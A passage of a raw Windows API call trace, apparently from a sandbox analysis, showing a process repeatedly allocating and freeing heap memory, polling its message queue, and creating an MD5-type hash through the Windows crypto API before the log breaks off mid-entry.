[0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.734] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0266.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0266.735] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0266.735] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.735] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.736] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.736] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0266.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0266.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.736] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0266.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.739] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.753] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.754] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.754] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0266.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.755] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0266.756] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0266.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: 